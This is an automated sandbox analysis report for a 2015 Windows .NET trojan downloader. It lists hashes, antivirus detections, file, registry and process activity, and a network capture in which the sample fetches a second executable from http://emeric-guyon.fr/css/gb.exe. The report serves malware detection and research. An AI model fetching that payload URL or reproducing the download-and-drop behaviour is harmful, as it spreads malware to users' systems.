Analysis Date2015-10-21 15:38:05
MD5f38e6afee5fb177b9f312c0d178ce1c6
SHA1f52ec8e8948d421027efccb760f87bc0d3d7d1de

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section.text md5: 6376aa6606f2cc8f37420e7bc8c4aaeb sha1: 7850aa06c4127159e851a1bdda2bd65c3d857f3d size: 10752
Section.rsrc md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.reloc md5: f915ff8afa0c404927ae1d8f77c7207d sha1: 9586aebfebd1069a3c0b8fed4502f9162ce69374 size: 512
Timestamp2015-10-11 16:47:23
PackerMicrosoft Visual C# v7.0 / Basic .NET
PEhash0f1e9387c67591bdf758a5b3bd7081c11bd4d93b
IMPhashf34d5f2d4577ed6d9ceec516c1f5a744
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan.GenericKD.2800063
AVDr. Webno_virus
AVClamAVno_virus
AVArcabit (arcavir)Trojan.GenericKD.2800063
AVBullGuardTrojan.GenericKD.2800063
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyBackdoor.Win32.Kasidet.das
AVZillya!Trojan.Bladabindi.Win32.27710
AVEmsisoftTrojan.GenericKD.2800063
AVIkarusTrojan-Downloader.MSIL.Agent
AVFrisk (f-prot)no_virus
AVAuthentiumno_virus
AVMalwareBytesno_virus
AVMicroWorld (escan)no_virus
AVMicrosoft Security Essentialsno_virus
AVK7Trojan-Downloader ( 004c43101 )
AVBitDefenderTrojan.GenericKD.2800063
AVFortinetW32/Kasidet.DAS!tr.bdr
AVSymantecno_virus
AVGrisoft (avg)no_virus
AVEset (nod32)MSIL/TrojanDownloader.Agent.QB
AVAlwil (avast)GenMalicious-BL [Trj]
AVAd-AwareTrojan.GenericKD.2800063
AVTwisterno_virus
AVAvira (antivir)TR/Downloader.A.27188
AVMcafeeno_virus
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FilePIPE\ROUTER
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\netbios.exe
Creates File\Device\Afd\Endpoint
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\netbios.exe
Creates Processdw20.exe -x -s 728
Creates MutexGlobal\.net clr networking
Creates MutexGlobal\CLR_RESERVED_MUTEX_NAME
Starts ServiceRASMAN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\wkssvc
Creates FileWANARP
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates MutexGlobal\RAS_MO_01
Creates MutexRAS_MO_02

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1860

Process
↳ Pid 1056

Process
↳ dw20.exe -x -s 728

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\13534.dmp
Creates FilePIPE\ROUTER
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dw.log
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\13534.dmp
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSemeric-guyon.fr
Type: A
213.186.33.19
HTTP GEThttp://emeric-guyon.fr/css/gb.exe
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 213.186.33.19:80

Raw Pcap
0x00000000 (00000)   47455420 2f637373 2f67622e 65786520   GET /css/gb.exe 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   656d6572 69632d67 75796f6e 2e66720d   emeric-guyon.fr.
0x00000030 (00048)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000040 (00064)   702d416c 6976650d 0a0d0a              p-Alive....


Strings